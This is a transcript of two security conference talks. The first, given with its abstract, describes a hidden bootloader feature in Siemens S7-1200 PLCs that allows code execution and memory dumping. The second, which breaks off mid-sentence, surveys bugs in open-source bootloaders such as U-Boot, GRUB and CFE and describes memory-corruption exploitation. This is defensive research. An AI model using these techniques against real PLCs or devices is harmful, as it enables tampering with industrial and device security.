together and we get code execution and with Ali's words with this technology, we're going to rocket the PLC. And before we go into what this actually allows us to do is a little word about the stage of payload. So I wrote this chain of different invocations and it turns out that this write to IRM is somehow very slow in the first place, but then also error prone so the device can just error out. I'm not quite sure what this pertains to, but it would be interesting to know from the Siemens engineer. But it basically led to me having to inject a little encoded payload which just has a subset of bytes which gives us an interface to perform more performant reads and writes with an arbitrary write primitive and then use this to inject second stage payloads. And this is what we want to demonstrate here. Thanks. So now we will have our demo, four demos actually. So the first one is actually just seeing the communication, basically sending this request and getting a response and basically sending the stage payload. So in the op is the raw UART communication. Don't worry, it's getting zoomed later. And in the down is like our client which actually talking with the PLC and sending these commands. So we are just running our UART and here is we are sending our command. And if you look at it in op, you see that dash CPU signal came from the PLC and now we are sending our stager and a stager just send us just one acknowledgement so we know that's a stager running successfully. This is for framework version, bootloader version 421 basically. So now we are going to do something else. We are going to actually dump the framework from a running PLC and compare it with the framework downloaded from Siemens website. So first we are going to actually unpack the framework downloaded from Siemens website because it's a compressed with LZP3. So that's what we are going to do. I hope. Oh, no, we are actually setting up our SSL connection first. So SSL port forwarding, SSH port forwarding before and we are just checking that the PLC is running properly. So like this is not a broken PLC or something like that. We wrote something so we just make sure that the web server is opening. We open the web server. Yeah, it's open. Good. And also try to log in to the web server of the PLC. Just again, make sure that the PLC is functional. So also enter the password. I guess everybody can guess it. And then so you see that we log in eventually and in the left side you see all the functionalities which loads related to the PLC. So it's a working, running functional PLC. And so now you are going to decompress the framework downloaded from Siemens website after checking for export license and stuff. So they want to make sure that people from Iran and North Korea don't get it. I'm from Iran, by the way. So here we have the unpacked framework, but because the framework is very large, as Toby has mentioned earlier, what we are going to do is that we are just going to export 256 kilowatt of the framework from some part of the web server and in the IDA. So we have to set the big NDNS for the CPU and also rebase the framework. So as you can see here, there is no function yet, but once you rebase it, you have all the functions as well. And yeah, so then we just go and export 256 kilowatt from the framework. So we specifically slow down the UART because we want to make sure that we don't do it too fast to overflow the buffer which we have internally in the PLC. So here, for example, in this address, 691E28, we are going to export 256 kilowatt. This is from the framework, Siemens framework, right? So we just export it. So yeah, so it's now called FW0X691E28 in the folder out. So now we are done with this part. We are going to dump the same address in the PLC, so from running PLC. I have to mention again, so this is the top part is basically raw UART and this is basically our client part. And we are dumping it. We are cold boot style attack. So we are basically resetting the PLC and before it overwrite the RAM, we are basically dumping the contents of the RAM. So this is the address, 691E. This was the same address, basically. And we are dumping 256 kilowatt. And here we send MFGT1 basically and then got the dash CPU and then the rest of the stage and stuff goes. And now basically we are sending packet and then eventually get received. So basically got all the payload dumped in memdump691E28 basically. So this is from the RAM of the PLC. This is not anymore from Siemens websites. We are just SCP to our own machine and then compare it. So now we have the memdump and original frame where 256 kilowatt each and then we are going to compare them with each other. And as you can see, should look here. Like you have like 100% match meaning that it's exactly the same frame where which is available in Siemens websites. We dumped it directly from the Siemens PLC memory using this special access feature. So let's do another one. So this time we want to show that unconstrained code execution in just a very basic way. So we are actually just writing a custom payload to the PLC and get a hello or greetings from the PLC. So basically we just ask the PLC to send us this message all the time. So again, so we are sending our custom payload right here. It's a hello loop and basically the PLC just sending this loop for us. So all of these things again are for bootloader 421. We have to readjust certain things because Siemens, I think they updated again the bootloader in the recent 2019 December which we bought new PLC again, once again. And now here we get a response that the PLC is sending basically to us. These are raw data which PLC keeps sending to us that's showing that we are receiving this. But maybe this was too basic. Again, these are the raw data which we are getting from the PLC. Let's actually do it a little more complex, show something that is not from us. So we have a game called TicTacTo inside the PLC. And I guess if you don't know this is how TicTacTo is, like this is how I'm playing when I just draw with Google. So now we are again going to send our custom payload, but this time we are just using partial quotes from somebody else from the Internet and just compile it and then upload it to the PLC. Obviously you have to readjust lots of things there. So we are sending our payload including a stager and these are the raw data again. These are our client. And eventually you will see the TicTacTo interface which you have to enter. So player 1 is actually playing with the X and player 2 is playing with like 0. So you see when you position which you choose, you have X, X and hopefully player 1 wins. Yes. So that was it. So that was a demo. Obviously there are lots of other ideas which we can work on on injecting other custom quotes using this special access functionality. We are still working on this. Like lots of other things on Siemens. We are sorry Siemens, we are just working on this. There are more to come, but in the meantime there are some ideas for other people in case they are looking into this and want to investigate security of Siemens PLCs. So using this special access entry you can do some more certain things. So for example you can use the special access functionality to write to the framework. As we mentioned this functionality is available and it doesn't require those cryptographic signature which normally during update process of the framework available. So you can just bypass that and it's just CRC checks. So what you can do is that for example adding an entry to other initialization routine which is available. And then or also you can do it before other initialization routine which we call internal TIH initial. Another one which we can do, if you remember Tobias talked about some undocumented and lots of creativity and creating music. So what one person can do is like basically adding a specific handler or overwriting existing handler. And what it makes actually is like something like Tritone. I don't know if anybody know her about Tritone. It's a malware which we are attacking Petrorabic in Saudi Arabia. So they were trying to do it in a TCP but attacker here can maybe do it in HTTP example and just listen and baiting for commands. And also other alternative is like patching one of the jump tables in the AWP handlers which can be also used for process specific attack. So what else is out there? So what we looked at attack surface in the Siemens S7 PLCs. There are like from perspective of local privilege attacks. What we looked was bootloader. We are still working on hardware attacks and some hardware software attacks on the edge is still ongoing. Work which we don't obviously discuss now. Also interesting thing I think if somebody who is interested in security of PLCs and especially internals. We are talking about like this general segregation of network and stuff like that in ICS. I'm talking about more advanced low level stuff. We think like MWSL is an interesting target. There are probably are some like bugs in their implementations. Also with respect to file system parsing and framework signing. There are probably some stuff and also MC7G parser basically which they have from a privilege escalation perspective. And also from remote code execution perspective both mini web server and also any network accessible services which they have might be interesting. We are actually also looking at this part right now. So as a conclusion PLCs are becoming more complex. That's true because they are actually providing more and more features. And because of this more complexity there will be more bugs. We can see for example in the MWSL which we are looking at now. Also vendors try to basically more make it more complex. They have basically some anti debugging which we discussed in Siemens PLCs. But also they have for example frame rate integrity verification. So the signed framework like upload to the PLC and stuff like that. So they are making it more complex. But what we have to know is that if in their like threat model which like lots of people make or this security ecosystem which they built. If they have a feature which undermines the same security ecosystem which they designed. I think it's obvious that they have to remove. Like with the case of bootloader case in the special access feature it is one of the good examples. And of course customers also have to know because if they have such a feature and they need it as long as customers know it's fine. But when they don't they can't calculate this risk in their strategy or in this threat model which they have. And also they have to think about, rethink about security via security. Maybe they allow us for example as researchers to access their devices better and easier to investigate it more. We are still doing it but it's just taking longer. And I believe that there are lots of things more to be done on like PLCs. And Siemens will not be the last one which we are working on. So we have to thank some people, Torsten Holtz, our supervisor is not here. Thomas, Alexander, Marina, Lucian, Nikita and Robin for their help in their work. And now we are going to answer questions. Thank you. So yeah feel free to line up for the microphones or write your questions in the Elisa room. Ah, there you go. Hello. Yeah. So there's one question from the internet. Did you check the MC7 parser? If yes, did you find any hidden unknown machine 7 instruction on it or something? So you want to answer? It's fine. So just, is it recorded or I have to repeat it again? So they ask that if we check the MC7 parser. Ah, okay. So it's fine. So we didn't like truly investigate the MC7 parser but we are working on it right now. Hello. How were you able to find the MFG security password? Oh, that's a very long story. First of all, like we had it in front of us for a long, long time until Siemens introduced this anti-debugging feature. After that, like we had to find other ways, other means to find it, to find like similar function, like similar ways that allow us because one thing we should then discuss here is that we didn't tell you about how we, for example, executed that instruction before in the PLC. It was involved some works which we received help from some researchers in Netherlands and in France. So this was something informed by Siemens in 2013, I think. They knew about it but until 2016, they patched it and then it became like basically they tried to protect their PLCs from this kind of attack. It was never published before. So we were using it and we don't want to talk about it because the original authors didn't want to talk about it but we replicated what they were doing. And then once we really had to look for other ways, like then it opened our eyes that there are some other functionalities as well there, such as for example bootloader. But before we needed it, like we never actually looked at this thing. So it was like in front of us for like two years. One interesting piece of a background story on this is that we actually in the previous technique that we used, we actually overwrote the conditional jump that would lead to this special access feature being executed with an unconditional jump. So we basically cut out 60% of the whole code of the firmware image by accident and then I just, because of the hunch that I was talking about before, that there is just too much functionality, I revisited it and actually realized that it was exactly the spot that we overwrote before and we had to basically replace it and use it for our own sake. Is there any boot time security other than the CRC check? So are you able to modify the contents of the spy flash and get arbitrary code execution that way as well? So it depends in which year you are talking about 2017, 2016. So we are talking about the same models of the PLC but in 2017 and 2018, no. So you could basically just take out the spy flash, overwrite it and that was fine. But if you were overwriting and it caused a halt in the CPU core, it would again trigger that anti debugging technology which they have with this watchdog basically. But from like frame very integrity verification, well basically once you write to the frame where it is written to the NAND flash, well it's just a CRC check sum. But during the update process, no, there are some cryptographic checks but once it's written, no. There are some problems there which again, it's a still ongoing work and we don't want to discuss about it but nice cat. Thank you. Hi, thanks for your talk. Could you elaborate on your communication with the vendor and the timeline? Yes. So first of all, we know about this problem for like one year and a half before we reported to the vendor and the primary reason was that we were using it for some other project. Actually this result is actually from a site project rather than the main project because the main project is still something else and it's still ongoing. But from the side of that project, we had that access and because we were worried that reporting to the vendor, they can't fix it with software update and then do not allow all other CVEs which we find from this other project. We didn't want to. Eventually at 2019, Thomas Weber wanted to talk about his talk on like basically this JTAG interface with full core site and then we decided to actually talk about it as well. But other than that, we actually talked in June, I think with Siemens and they confirmed that there is this hardware based special access feature and they say that they are going to remove it. And that was it. We also send them a write up for them to read. So there is one last question from the Signal Angel over there. Yeah. So there's another question from the Internet. If tools like Flash ROM doesn't have support for unknown SPI Flash ROM chip, then how do you usually extract firmware if you don't want to decap chip or use SOIC8 socket? Can you repeat it again? I didn't get the question. So first of all, we never actually decap the SPI flash. So that's just did it for the CPU. And just because we want, we know that Siemens re-labeled their PLC. So it's not their own CPU. It's from Renaissance. But that's why we did the decapping. So story of decapping, setting it aside. But from other things, so basically there are still this functionality, this bootloader functionality, which actually lets you read the content of the memory. So that's one thing you can read. Obviously you don't even need that thanks to one of my students. We now know that actually you don't even need to take out the bootloader chip. We basically can just connect directly in the board and dump the framework. Marcelo, that's his name. He's here actually. Anyway, so you can just directly read it. And yeah, I don't think the reading part, especially some part of it is protected, especially in the recent versions, which you can't read everything. But beside that, I don't think there is any hardware now yet. I'm sure that they are working on that. And we are working also on something to bypass that. Okay, that was all. Next talk is going to be about delivery robots. Sasha in 20 minutes. So let's give them a hand. Thank you for attending. Thank you.
A deep dive investigation into Siemens S7 PLCs bootloader and ADONIS Operating System. Siemens is a leading provider of industrial automation components for critical infrastructures, and their S7 PLC series is one of the most widely used PLCs in the industry. In recent years, Siemens integrated various security measures into their PLCs. This includes, among others, firmware integrity verification at boot time using a separate bootloader code. This code is baked in a separated SPI flash, and its firmware is not accessible via Siemens' website. In this talk, we present our investigation of the code running in the Siemens S7-1200 PLC bootloader and its security implications. Specifically, we will demonstrate that this bootloader, which to the best of our knowledge was running at least on Siemens S7-1200 PLCs since 2013, contains an undocumented "special access feature". This special access feature can be activated when the user sends a specific command via UART within the first half-second of the PLC booting. The special access feature provides functionalities such as limited read and writes to memory at boot time via the UART interface. We discovered that a combination of those protocol features could be exploited to execute arbitrary code in the PLC and dump the entire PLC memory using a cold-boot style attack. With that, this feature can be used to violate the existing security ecosystem established by Siemens. On a positive note, once discovered by the asset owner, this feature can also be used for good, e.g., as a forensic interface for Siemens PLCs. The talk will be accompanied by the demo of our findings.
10.5446/53175 (DOI)
Okay, please welcome our next speakers, Joseph and Ilja, who will be talking about how bootloaders are broken and how to look into them. Please give them a warm round of applause. Hello, does this sound okay? Cool. Yeah, so welcome to Boot to Root, auditing bootloaders by example. I'm Joseph Tartaro. I hack things for IO Active and this is my second time at Congress, so I'm really excited to be back here. Hi, I'm Ilja. This is my 18 or 19 time at Congress. Happy to be back here too. I've spoken here, I think, seven or eight times before and I'm very excited to speak here together with Joe. We've been working together on bootloaders last year in change and this is minus the NDA coverage stuff. This is some of the things we've observed and seen, so I'm very excited to do this. Yeah, so the expected audience for this talk would be embedded systems engineers, security people who are interested in embedded systems and just curious security people. Just a caveat. We're going to be quickly going through about like 70 slides or so and a lot of it's just like examples of C source code, so if you did not realize you were signing up for an hour of that, feel free to walk out. We're not going to be offended. And then another caveat would be this isn't really trying to flex and show look at all the bugs we found. The purpose of this was to kind of show people, hey, if you have not looked at bootloaders before, this is our recommended areas of attack surface that are interesting. This is probably where you should get started. And in some examples of nobody's really looking at them and they should start, so that's pretty much what's going to go on right now. So quickly, here's the agenda. We'll discuss why they're important. Some of the common ones we looked at, attack surface and our conclusions. So there's going to be a wide interpretation of bootloader. So basically what we mean by that is anything that's in your secure boot chain. And if you don't have experience with these or you haven't looked at them much, you can kind of think of it like from an operating standpoint of user land calling into kernel space, you'll have kind of normal world calling into secure world and stuff. And that's kind of what you're looking for is those pivots and when they're processing, you know, attacker user control data. So why? Because they're, you know, critical for security. It's a key component of your chain of trust and it's very obvious that a lot of device designers are poor at hardening and limiting attack surface. And what we mean by that is a lot of the devices we've looked at over the last year or so, you'll find devices that have like full network stacks even though they don't need a network stack. You'll have a bunch of code loaded up to handle file systems that are never expected. So it just, it doesn't really make sense why they're not limiting all that attack surface. There's also a huge under estimate of reverse engineering. People just kind of assuming that there's no bad actors and nobody's really going to look at this thing and it's this hidden black box that we should ignore. And a little story behind the presentation is we're actually on a train going to a baseball game. I was trying to introduce Ilya to the lovely game of baseball. And we were talking about U-Boot and I pulled out my phone and we went to the U-Boot GitHub and in about, I don't know, 10 minutes, 15 minutes, we ran into like 10 bugs and we went, yeah, we should probably audit some of this stuff. And kind of inspiration from a previous talk that Ilya has given at Congress where he audited a bunch of different BSDs. I said, why don't we look at a bunch of different boot loaders. And so just to give credit where credit's due, we are not the first to look at any of this stuff. So this is a list of people that kind of inspired us, have done really interesting work. And we recommend if you're interested in any of this and you enjoyed it, you should go check these people out and see things that they have released in papers and stuff like that. So where are they? Boot loaders are pretty much in everything. You have your workstations, game consoles, your TV, you know, everything. And generally the security basically depends on this. So it obviously really, really, really matters. And so with that said, we basically started looking at these common open source boot loaders. So U-Boot, Core Boot, Grub, TBIOS, CAFE, which is Broadcom, Ipixie and Tionocore. And we're just looking at what's on GitHub, what we downloaded. Obviously in your real world scenarios, the devices that you have at home or go buy and start looking at, they're going to be heavily modified. They're going to have weird custom drivers that aren't available, things like that. So, you know, we're not here to argue the likelihood of some of the bugs we found. We're not going to argue exploitability. Half of them, we don't know if they're exploitable. We don't know. We will for one. Yeah, we will for one. We don't really like, that's not really the point of it. The point is to kind of show people, show designers what they should be concerned with and show interesting, or researchers that might be interested what they should look at. So U-Boot is extremely common. It's in a ton of devices. There's a huge, very customizable config for all different sorts of boards and stuff. There's concerns for environment variable stuff. There's a super powerful shell. So you'll sometimes see even shell injection concerns based on environment variables. It's pretty funky. And there's lots of drivers for tons of devices. So it's kind of a great first step of looking at something that kind of covers a huge breadth of things. And so features of U-Boot that are interesting would be, you know, network stack for different protocol parsing, file systems. And they also will load their next stage images from like all sorts of weird, like, archaic things that nobody uses anymore. And it's just used by tons of devices. And then Core Boot. And I apologize. This is a little dry right now. We'll eventually get to this stuff. But Core Boot, you know, it's more targeted towards modern operating systems. There aren't like legacy bio support. It actually, they took a methodology that other projects don't, which is they're not going to implement features that they don't want to. So if you're trying to do network booting or something, you use Core Boot to boot into like Ipixie or something. They're not going to implement that feature. These are used in Chromebooks. And obviously some of the interesting parts come from Google. And one main interesting area is SMM. And then Grub. Obviously you guys are all familiar with this. The primary concern here is a multi-boot spec. And they support just a ton of file systems. So that's obviously the attack surface you'd be concerned with. But the interesting part here is that there are U-Fee signed versions of Grub. So that's kind of like your secure boot break right there. If you find a vulnerability that's an assigned version, you can now load that into your U-Fee and exploit that vulnerability and you're good to go. And then CBIOS is the default BIOS for KEMU KVM. This supports legacy BIOS stuff. So you'll see that this gets booted into from things like Core Boot. This supports TPM communication. So that's kind of interesting. And it's the compatibility support module for U-Fee and OVMF. And then Broadcom Cafe. So this is used in a ton of different network devices and TVs and stuff like that. And the obvious attack surface there would be network protocols, the network stack. That's what you'd want to look at. Ipixie. This would be more network-based stuff. Various parsing and similar to Grub. There's U-Fee signed versions. So it's a great potential pivot for secure boot stuff. And then finally, Tionakor. There's really no introduction needed here. There's been a ton of great presentations over the last 15 years. People just doing everything to this thing. And due to that, since it's pretty much the most scrutinized one out there, it's really mature compared to everything else. So when you bash Tionakor, realize that it's way better than everything else. So there's a lot of implementations built on top of it, like platform-specific stuff, Qualcomm, ABL and XBL, things like that. So you'll have all these. You have the base Tionakor EDK2 and then you have all the custom stuff built on top. And then related to bootloaders, you have things like TrustZone. And that's kind of where I mentioned. You have like normal world and secure world. You'll have these interesting pieces of code that are running into those secure areas that you're going to want to look for. You know, pivots into there so you can gain access to secrets. And then obviously from the host operating system, the attack surface there would be you can modify things like NVRAM. So you can set variables that when the next time you reboot, the boot loader is going to process as variables. And this slide's more for reference. Later you can get the slides or take a picture or something. These are just links to some instructions for building and whatnot. So if you wanted to start looking at these, you can quickly build a little environment and poke around. So just really quickly to go through the concept of secure boot, you kind of have your chain of trust. You'll have the boot ROM that will then verify and load various other loaders that then verify and load the next thing. And you'll sometimes have a TPM involvement. You'll have some TrustZone involvement and then OS interaction stuff like the OS basically setting things like NVRAM which will set boot configuration stuff and whatnot. So the boot ROM itself is something you've probably seen the talk by Cordy Oryoop, I think earlier. It's really important because it can't be patched. It's a hardware revision would be required if vulnerability is found. And it's so early in the stage and you would basically compromise everything after it that is where you'd want to go. It's extremely bare minimum. It does some initialization of hardware and memory stuff. And then you'll find things like maybe implementations of fast boots. You have a USB stack. So that's an obvious attack surface you'd be interested in. And then it will verify the signature of the next stage and then boot that. And then you move on to the next stages. And this is where they start initializing the rest of what's necessary, network stacks, SMM handlers and whatnot. And they'll basically just keep handing off. And then you'll run into things like trusted boot and measure boot which is, you know, verification and then measuring which is kind of more for logging and whatnot doesn't actually mitigate anything. It just kind of alerts you of stuff. So some hardware environments are a little different. Like the secure world stuff, you'll have ARM or trust zone. Windows has VTL 0, VTL 1, hypervisor stuff. And then, yeah, I'm basically repeating myself. And then eventually the operating system, that's going to get the kernels going to be loaded, it's going to be verified. And then eventually start running and then you can have fun. So early observations is everything we pretty much looked at that's open source, there's no privilege separation. So if you were to compromise a piece of component, you pretty much rule everything. And what's interesting is there are some proprietary boot loaders that you're starting to see, like Apple, for example, they're doing some aspect of privilege separation. So if you were to exploit a portion, you didn't necessarily control the world. And so right now, at least all the stuff we looked at did not have anything like that. But maybe in the future, we'll see that. So this is the list of the attack surface that we think people should be interested in and focusing on. You have NVRAM, file systems and files, all network stack protocol stuff, all various buses, you know, SMM, DMA and hardware stuff. The interesting thing about buses that we've noticed is that embedded designers seem to inherently trust anything that end users should never interact with. So they go, okay, an end user uses USB, so we should verify some of that, but they do a bad job. But an end user doesn't play with the spy flash, so just inherently trust it. Or an end user isn't to the TPM. So just if the TPM says something, run with it and they mess it up a lot. So NVRAM, these are the various environment variables that can be configured, you know, for the next boot cycle. And like I said, it's basically processing of user controlled data. So if you start looking at some of these boot loaders, here's the interesting functions you'd want to look at. For example, in Uboot, you just kind of call for environment get and grab through and you see them grabbing the environment variable and see what they do with it. If they're not doing any sort of validation, you're going to hit a book. And so an example of that would be right here, you see there's an environment get for boot P VCI. It checks if it existed. It will then do a stir length and then just mem copy it directly into a buffer without validating that it can fit the buffer. And this is actually kind of funny earlier today. We were like, ah, we should try to exploit one of these just to show it. So we toyed with this one and, you know, just do a bunch of bytes and it starts just kind of sending these weird packets over the wire and a bunch of boot P stuff. You'll see later on you just have full raw packets of whatever payload we send. But it wasn't very realistic. It kind of went, started getting into like the key move like network implementation stuff. So we kind of avoided and moved on to a different bug. But as you can see, it's very easy for you to start looking at the stuff and being interested in it and quickly set up an environment and mess with exploitation and we'll get into it but there's no mitigations. So as you see, there's a bit of a pattern here. Environment get host name, mem copy with stir length. No checks. 128 byte buffer, environment get boot dev, stir copy. It just keeps happening. This is kind of what we were talking about. Just the quality code is not very great. This is, what's funny is when we were messing with that boot P VCI stuff earlier this morning, we went, oh, this is going to be more involved. So it was like, well, let me just go find a different bug. You know, 10 minutes later, it's like, oh, I found a different stack smash. Okay, let's work on that one. It's just like, this is a perfect example. The environment get the variable and then they'll grab the very first element of that variable as a length and then use that as a length. And it keeps happening. So just a quick example. See this. So the attack scenario of this would be, you have a device, you have NV RAM that you can physically modify as you have physical access. And this is kind of an example of the default NV RAM. So we just threw an environment variable with 600 bytes and you'll see towards the bottom there's four bytes where we threw a function in there and that's the address. So just this had to do with the GFFS to file system loading. So you just do FS load. And that's it. That's shellcode being executed. So this is... Sorry, I can't see. So obviously, if you've never looked at this stuff, it's kind of fun to play around with and you should start poking at it because why not? And screenshot. Cool. So that was the NV RAM attack surface which is usually the most fun to play with. Programming to spy flash sometimes may take a little bit of fiddling but in terms of attack surface and fun things to play with, it's, you know, as Joe said, often overlooked and so it's easy to toy with. And so you saw all this Esperant Devs and MIM copies and string copies. So there's a lot of fun there. But obviously there's not just NV RAM. There's more attack surface to sort of a trusted boot environment. And obviously one of them is the file system right because this thing needs to boot and it needs to find images and they're stored somewhere and your file system sort of brings order to that chaos. So basically you need to mount your file system and often file systems are not signed or are technically checked or not all of it is because before you can do that, you need to be able to read something, and so obviously an example of a common file system would be the file system. If your boot environment supports loading your USB drive and for storage, it's probably going to be fat. Depending on, and the flash itself may have its own proprietary format or it may use X2 or something else. But clearly the file system parsers, I mean that's prime attack surface. A closely related is obviously the files inside of your file system, right? Now depending on what your boot environment looks like, some of these files are going to be integrity checked but some of them might not be, right? And so those file parsers are interesting attack surface. And if you're either looking for bugs or you're building a product, we would highly recommend fuzzing these. And it's like starting with AFL is probably a good starting point. But we'll show some examples of some bugs we saw in certain, in a number of boot loaders. So we'll cover X2, we'll cover a bitmap splash parsing one. And then the other ones are sort of examples of where there could be bugs but those two we'll cover. So this is grub, and this is grub X2, and grub X2, you know, this is the sim link code so it looks to file system and it goes, oh, okay, this is the sim link, how do I parse the sim link? And so the sim link says, hi, I'm a sim link, I'm this big. And what grub does is, oh, great, I'll allocate that much size but I'll do one more for an old byte. And of course that is a classic in Azure overflow. And the grub memory allocator actually returns a valid pointer for a zero size. So this is a perfect primitive so you get a pointer to something that is zero size and then it actually reads the sim link content from the file system into a zero size buffer and obviously that's going to cause memory corruption. And a primitive, you can't see it here but a primitive is really nice because that particular read function actually, if there's no much more on disk, it stops reading. So even though you can save, read four gigs, you can make the layout so it only reads, let's say, a thousand bytes or a hundred bytes. And so you have this near perfect primitive to cause memory corruption. This was in Tiana Core, for example, this was the bitmap splash screen parser and I don't know anything about bitmap internals. It's a very simple format but basically you can have a four-bit bitmap and that gives you a pallet of four by four which is 16 bytes. And so the idea is if you have a four-bit bitmap, then it has a 16 byte pallet and so it goes and reads that 16 byte pallet except you tell it how big the pallet is and you can say, okay, I know you're expecting a 16 byte pallet but I'm giving you a 256 byte pallet and it will read it into a 16 byte buffer. So that was broken and then for the 8-bit bitmaps, similarly it was broken the same way. And these are just a tip of the iceberg. There are many, many, many more. This did not take long to find. But let's move on. Obviously now that we've looked at some local stuff and some physical stuff, what about remote? What is there? Obviously if you're talking remote in the modern world, you're talking TCP IP. So you need a TCP IP stack and you need to have some services that you either expose or that you have client code for that you go talk to. And that's bootp and DHCP and DNS and iSCUSY and NFS. And if you're in a corporate, if you're a corporate net, you probably want to have IPsec and then HTP and HTTPS and TFTP. And sure enough, most bootloaders have code for this and then you start asking, okay, what's the attack surface? For TCP IP, if you implement your own stack, well, good luck because you're going to screw it up. But secondly, it's like, okay, well, if you look at these things, you take a step back and say, okay, well, really this is all mostly TLV parsing. And so you go and look into what are the things that can go wrong if you do TLV parsing and they'll be out of bound reads pretty much everywhere and you'll see in those loops and lots of places and things like that. If you look at the protocol at the top of that, like DHCP and DNS, you have your standard network attacks where you'll see lease stealing or cash poisoning or things like that if you don't protect your ID. So if you have a static ID or you don't validate your IDs or you generate predictable IDs, you can have these kind of poisoning, stealing, man-to-middle attacks. And then thirdly, obviously, the thing we really like to see is memory corruption bugs. At the end of the day, you take network data and you parse it and if you do it wrong, you may cause memory corruption bugs. Another sometimes overlooked interesting bug I think when you're doing network parsing is when you have information leaks. So this often manifests itself, I mean, hard bleed, of course, was one example. It was a perfect primitive. But generally, it will be this thing where you end up generating some kind of pack as a response to something and you'll have done the memory allocation but for some reason not initialize something and so you end up sending initialized data over the network. So this is sort of the common things you see network stacks in general. So if you are looking for these kind of bugs in a boot environment or if you are building a product that does this, I would highly recommend fuzzing them. There are numerous interesting network fuzzers. If you're looking for network stack fuzzing, I would recommend ISIC. It's pretty old but it's still incredibly, incredibly effective. It tends to break most network stacks. So with that said, let's show some examples. I was, so UBoot, for example, this is the UBoot DNS code and if you see that, the TID, that's the DNS ID and it's basically, they give it a, they use the static DNS ID of one for all DNS packets that they send out. So doing DNS man in the middle on a UBoot environment is extremely trivial. You guess the DNS ID by saying that it's one and you are correct 100% of the time. So this is Broadcom's coffee and this is the DHP parser and it basically has this sort of junk stack buffer where it just needs to read something out of a buffer and it goes and says, okay, well, get me the length of that thing and it's a UIN date. So that means it can represent 0 up to 255 and then it reads 0 up to 255 into that junk buffer. So that's a stack corruption right there. If you then look at the coffee at the DHP parser, it's very similar where in this case it has a 512 byte buffer and then it basically copies the entire RX buffer into it and this is Ethernet so up to 1500 bytes gets copied into this 512 byte buffer again causing memory corruption. Obviously we're not done with coffee yet because it has such beautiful code. So this is the coffee ICFP ping handler and this has this really cute sort of use after free bug or double free where it basically sends out a ping and then it sits there receiving the, you see the while loop there and it basically sits there receiving packets until it finds the right one but it also, because it doesn't want to have it on its loop, it has a timeout and there's this interesting condition where if the last thing it looked was the packet you were looking for but it also timed out at the exact same time it freeze that packet twice which obviously can lead to memory corruption. Again we're not done with coffee yet. Oh right there we go. Not done with coffee yet so this is the IP handling coffee and if anybody has ever looked at an IP header which I would assume most of you have, you'll know it has an IP header length and a total length and of course coffee needs to know this because it needs to know where stuff is but coffee validates neither the IP header length or the total length so once you start messing with those coffee blows up really fast. So that was sort of a quick overview of all the trivial TCP and TCP related bugs that show up in your after boot loader. So but let's say you got that covered and let's say, you know, okay what's the next thing? What more sort of network stuff can we do? And then of course what comes to mind is Wi-Fi, you know, 8 or 2.11. And a surprising number of boot loaders don't have 8 or 2.11 so I don't know if that's sort of a sort of on purpose or just sort of we didn't get to having this feature yet but we will at some point and obviously it'll have bugs when we implement it. But we did find one that has it and I'll get to that in a second. One thing I did want to mention is that if you look at 8 or 2.11 like frame parsing, depending on which device you have and particularly which radio your device is using, you'll have radios that do a lot of parsing on the radio in which case the stack is kind of covered because it's, at least you hope it is where the radio does a bunch of validation. But then there's a whole bunch of radios that sort of, you know, they take package from the wire and they just don't do anything and just pass it on to the OS. That's the stuff that's interesting from a, from a tax service point of view if you look into attack the boot loader and not the firmware. So yeah, we looked at Pixi and of course, you know, anytime you do any kind of Wi-Fi stuff the first thing you do is you're looking for an SSID, right? This is what this thing does and, you know, it sort of has this SSID buffer which an SSID can be up to 32 bytes so that is 32, well, it's 33 bytes because it's 32 plus 1 and it has this loop where it sort of goes over IE's that it gets and then when it finds the right, the IE for an SSID it says okay, we'll take this IE and we'll do IE length and IE length is a U and 8 so it can be up to 255 and it copies the SSID IE into the SSID buffer which is only 32 bytes causing memory corruption. So that's iPixie for you. Okay, so the next one if you're thinking networking would be Bluetooth and Joe and I have actually we've looked at proprietary bootloaders that have Bluetooth support. Unfortunately, we can't talk about those bugs because they're covered by non-scope agreements and we tried really, really hard to find a similar equivalent in any kind of open source bootloader and we couldn't find one. So unfortunately, we can't give examples of sort of Bluetooth bugs in open source bootloaders but I do kind of want to in general terms talk about what we have seen and where we suspect the bugs are going to be if somebody does do this in an open source bootloader or something that's a new bootloader. So and also like if you're going to do Bluetooth in a bootloader it's usually for you know HID device right this is for keyboard mouse this usually ends up being for consumer devices. But in general if you look at Bluetooth stack and you're looking for any kind of you know parsing bugs there's three sort of recurring teams. There's three sort of recurring teams that we saw when we looked at the Bluetooth stacks that we have and this is if you look at the lower layers like L2P cap and things like that and this is usually related to sort of frames and frame lengths so very, very large frames. So a frame can be up to about 65,000 bytes because the length is a UN16 and so if you create really large frames like right up to the edge that tends to blow up Bluetooth stacks. The other one is if you create very, very, very short frames you know less than what something is expecting that tends to blow up your Bluetooth stack. And then lastly because L2CAP can have fragmentation so you can have individual fragments that you will add together and every fragment can be X amount of bytes but the whole thing can be up to 65,000 bytes a byte, 65,000 number of bytes. So if you start playing around with the fragmentation we've numerous Bluetooth stacks have blown up. Again, I wish I could have shown an actual bug here but I wasn't able to find any in the open source boot loaders. So moving on to USB, this is a primate attack surface in boot loaders obviously. If you haven't followed the news in the last couple of weeks and months this has shown up in a number of devices. This is at least up till recently I think was sort of under reported or sort of people didn't quite care about it. But to me the USB stack is like that's the if I, any time I look at a USB loader at a boot loader my first thought is you know NV RAM and number two is USB. And USB is interesting because obviously a lot of boot loaders support USB because they'll use it either for storage or you know things like Internet dongles but often for storage where you know either you expose certain files or you try to do some kind of recovery boot from USB or something like that. And so basically if you start looking at how USB works at a slightly lower level it's not quite like it's not like PCI it's more packet based and so what happens when a device talks to a host the device is asked for quote unquote descriptors. And these descriptors say certain things about your device and based upon the number of descriptors that the host asks from you and all the answers you give them in the script responses the host can then figure out what kind of device you are and what class you are and what functionality you expose and all these kind of things. And so a lot of these descriptors end up you know being parsed and being parsed wrong. And so generally we often see either straight up overflows or double fetches because the way descriptors work is they're variable length content but the headers are predefined and the way it works is you first ask for the header and then based on the length of the header you ask for the thing again except the USB protocol doesn't allow you to just get the payload you have to reread the whole thing so you have to reread the header that you already had. And so in most implementation what happens is you go get the header you allocate a buffer and then you go get the header and payload again and you override the original header. Which means is you get to override the original header length and so you can have a talktow where your device gives you a header with a good length and then the second time it gives you a descriptor with a bad length and if your host doesn't validate that both lengths are the same bad things happen. And yeah, straight up overflows happen too because nobody ever expects the USB device. There's an example in Grubb for example where it goes and gets a descriptor and the descriptor says oh here's my config account I have this number of configurations go and fetch those in descriptors as well. And there is a predefined array of number of configurations that Grubb has and it doesn't correlate that with the config count. It just always assumes the config count is less or equal to the array. And so if you have a malicious device and you say hey I know your array is 32 bytes, 